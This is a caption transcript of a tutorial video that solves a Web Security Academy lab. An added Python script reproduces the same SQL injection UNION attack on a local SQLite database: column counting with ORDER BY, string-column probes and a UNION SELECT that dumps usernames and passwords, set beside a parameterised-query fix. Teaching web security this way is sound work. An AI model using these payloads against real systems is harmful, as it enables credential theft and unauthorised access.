Exploit SQL Injection to Retrieve Admin Password

Captions
If an application is vulnerable to SQL injection, then attackers might be able to retrieve data from different tables in the backend database. One of the main targets would be a table that stores the details of application users, including the username and password. During this video we look at a scenario where an attacker exploits a SQL injection vulnerability to extract the usernames and passwords of application users from the database. For the purpose of this video we use a SQL injection lab from Web Security Academy, and you can find the link to this lab in the video description. To solve this lab we need to exploit the SQL injection vulnerability in the search function of the application to retrieve usernames and passwords from a table called users, and then log in to the application as the administrator user.

OK, let's get started by clicking on "Access the lab". The home page of the application contains the list of products and their descriptions. There is a search function that filters the items based on the category. We turn the Burp intercept on and then, on the home page, choose one of the categories. Looking at the GET request in Burp, we see it contains a URL parameter called category, and its value is the category that we just selected on the application home page. OK, let's forward this request. The application completes the request and returns the list of the items within the chosen category.

Now let's see, if we change the category value and add a special character, how the application would process the unexpected data. Be sure the Burp intercept is on, and then choose a category. In Burp we go to the URL parameter, add a single quote to its value, and then forward the request. This time the application returns a server error, indicating that the submitted data containing a single quote character has interfered with the SQL query that the filter function is using to retrieve data from the backend database. The returned error in the application response is a sign that the category parameter in the filter function is vulnerable to SQL injection.

Based on the lab description we already know that the application database has a table called users, and this table contains two columns called username and password. Now that we have identified a SQL injection in the category parameter within the filter function, the next step is to perform a SQL injection UNION attack to exploit this vulnerability and retrieve the list of usernames and passwords from the users table.

But what is a SQL injection UNION attack? When an application is vulnerable to SQL injection and the result of the SQL query is returned within the application response, then we can take advantage of the UNION operator to inject our own SQL query to extract data from other tables of the database. Let's take a look at a sample SQL query to get a better understanding of how the UNION operator is used in SQL queries. This sample query executes both of the SELECT queries and returns a single result set containing the data from the c1 and c2 columns in table 1 and the c4 and c5 columns in table 2.

There are two basic rules for combining the result sets of two SELECT queries when using the UNION operator: the number of columns in both SELECT queries must be the same, and the data types must be compatible. Now that we know what the UNION operator is and what the rules are for using a UNION SELECT query, in order to inject our own query and ensure that the application executes the UNION SELECT query without an error, first we need to determine the number of columns and then the data type of the columns in the original SQL query that the filter function is using.

We can use the ORDER BY keyword to determine the number of columns in a SQL query. The ORDER BY keyword is used to sort a result set returned from a SQL query in ascending or descending order based on the values of one or more columns. In the ORDER BY clause we can specify the column name or the column number. Since we don't know the column names in the filter function's SQL query, we will use column numbers starting from 1, and we'll increase the number until we get an error message in the application response.

All right, let's go back to the application home page and choose a category. In Burp, right-click and choose "Send to Repeater". We turn the intercept off and go to the Repeater tab. In the Request tab, first we right-click and choose "URL-encode as you type". Then we go to the category parameter value and add a single quote, ORDER BY 1, followed by two hyphens, to ask the query to sort the result set based on the first column. Then we send the request. We don't get an error message, so we know the filter function query contains at least one column. Now we change the column number to 2 and send the request. We get a 200 HTTP response code, so far we know that the original query contains at least two columns. Once again we increase the number in the ORDER BY clause and send the request. This time the HTTP response returned an error, which means the original query doesn't have three columns. All right, so far we know that the SQL query contains only two columns, so the next step is to determine the data type of these columns.

Since our goal is to extract username and password values from the users table, in the original query we are interested in the columns that contain string values. To determine the columns that return string data we use a series of UNION SELECT queries. We already know that the original query returns two columns, so we only need two UNION SELECT queries, and each time we put a string value in one of the columns and use NULL for the other column. NULL is compatible with all data types, so it will not cause an error when the application executes the injected query. We use these two UNION SELECT queries to determine the data type of the columns in the filter function's SQL query: the first query checks if the first column in the original query is a string, and the second query checks if the second column in the original query contains a string value. When we inject these payloads, if we get an error message then the data type of the column in the filter function's SQL query is not compatible with string data.

All right, back to Burp Repeater. Once again we go to the category parameter, add the first payload to its value and send the request. We get a 200 HTTP response code, so the first column contains string data. We change the parameter value to the second UNION SELECT payload and then forward the request. As we see, the application didn't return an error, so the data type of the second column is also a string. So we managed to determine the number of columns and also the data type of the columns in the original SQL query.

Now that we know the original query contains two columns and both contain a string value, we can use this UNION SELECT payload to retrieve the username and password from the users table. In Burp Repeater we go to the category parameter value and add the UNION SELECT query, then we send the request. The request was completed by the application and no error was returned. By inspecting the HTTP response we can see the list of users and their passwords, so we managed to successfully retrieve the usernames and passwords from the users table. Let's copy the admin credentials and go back to the web browser.

Before we proceed to log in to the application using the credentials that we just copied from Burp Repeater, let's take a look at the application URL in the address bar of the web browser. Since the application is using a GET HTTP request for the filter function, we can see the category parameter in the URL, so we actually could exploit the SQL injection directly from the URL and without a proxy tool. Let's repeat the last step: we go to the URL, add the UNION SELECT payload to the category value and then submit the URL. As we see, the application returns the list of user credentials.

Now that we have the credentials for the administrator user, from the top right corner of the page we click on "My account". On the login page we fill out the username and password using the administrator user credentials and then click on "Login". As we see, we could log in to the admin account and managed to solve this lab by exploiting SQL injection. If you enjoyed watching this video please give it a like, and if you want to see more videos like this be sure to subscribe to the channel, as I upload new videos every week.
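The three-step methodology narrated in the captions (ORDER BY to count columns, NULL-padded UNION SELECT probes to find string columns, then a UNION SELECT against users), reproduced as an added Python example against a local SQLite database. This is not code from the video or from the Web Security Academy lab: the products schema, the two-column SELECT with its `released = 1` filter, and every row value are constructed assumptions so the script runs offline; only the `users(username, password)` table is taken from the lab description. The parameterised `safe_filter` is included as the contrast the page implies but does not show.

```python
import sqlite3

# Constructed stand-in for the lab backend. The lab only tells us there is a
# users table with username and password columns; the products schema, the
# two-column SELECT and all row values below are assumptions for this demo.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(name TEXT, description TEXT, category TEXT, released INTEGER);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO products VALUES ('Giant Pillow', 'A very large pillow', 'Gifts', 1);
        INSERT INTO products VALUES ('Pet Rock', 'Low maintenance', 'Gifts', 1);
        INSERT INTO products VALUES ('Secret Item', 'Not released yet', 'Gifts', 0);
        INSERT INTO users VALUES ('administrator', 'examplepass123');
        INSERT INTO users VALUES ('wiener', 'peter');
    """)
    return conn

def vulnerable_filter(conn, category):
    """The flaw: the category parameter is concatenated straight into the SQL."""
    sql = ("SELECT name, description FROM products "
           f"WHERE category = '{category}' AND released = 1")
    return conn.execute(sql).fetchall()

def probe(conn, payload):
    """Send one payload; (False, []) models the server error seen in the video."""
    try:
        return True, vulnerable_filter(conn, payload)
    except sqlite3.Error:
        return False, []

def count_columns(conn, base="Gifts", limit=20):
    """Step 1: ' ORDER BY n-- with n rising until the DB rejects the column index."""
    found = 0
    for n in range(1, limit + 1):
        ok, _ = probe(conn, f"{base}' ORDER BY {n}--")
        if not ok:
            break
        found = n
    return found

def string_columns(conn, ncols, base="Gifts"):
    """Step 2: one UNION SELECT per column, 'a' in that slot and NULL elsewhere.
    NULL is compatible with every type, so only the probed column can error.
    Caveat: SQLite is dynamically typed and never errors here; PostgreSQL,
    Oracle and MSSQL reject a string in a non-text column, which is the
    signal the video relies on."""
    result = []
    for i in range(ncols):
        slots = ["NULL"] * ncols
        slots[i] = "'a'"
        ok, _ = probe(conn, f"{base}' UNION SELECT {', '.join(slots)}--")
        result.append(ok)
    return result

def dump_users(conn, base="Gifts"):
    """Step 3: both columns accept strings, so pull username/password into them.
    The result mixes real product rows with the injected credential rows."""
    ok, rows = probe(conn, f"{base}' UNION SELECT username, password FROM users--")
    return rows if ok else []

def safe_filter(conn, category):
    """The fix: a bound parameter, so the payload is only ever a category value."""
    sql = "SELECT name, description FROM products WHERE category = ? AND released = 1"
    return conn.execute(sql, (category,)).fetchall()

if __name__ == "__main__":
    db = build_db()
    print("single quote breaks the query:", not probe(db, "Gifts'")[0])
    n = count_columns(db)
    print("columns:", n, "string-compatible:", string_columns(db, n))
    for row in dump_users(db):
        print(row)
    print("parameterised query, same payload:",
          safe_filter(db, "Gifts' UNION SELECT username, password FROM users--"))
```

Two practical notes on the payloads: Burp's "URL-encode as you type" takes care of the spaces, and a browser address bar does the same, but on MySQL the `--` comment only works when followed by a space, so the payload there needs a trailing character after the hyphens. Also note that the `--` comments out the original `AND released = 1` condition, which is why unreleased products can appear alongside the injected rows.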
Info
Channel: TraceTheCode
Views: 6,598
Id: U_08XtEM3ME
Length: 9min 42sec (582 seconds)
Published: Thu Mar 24 2022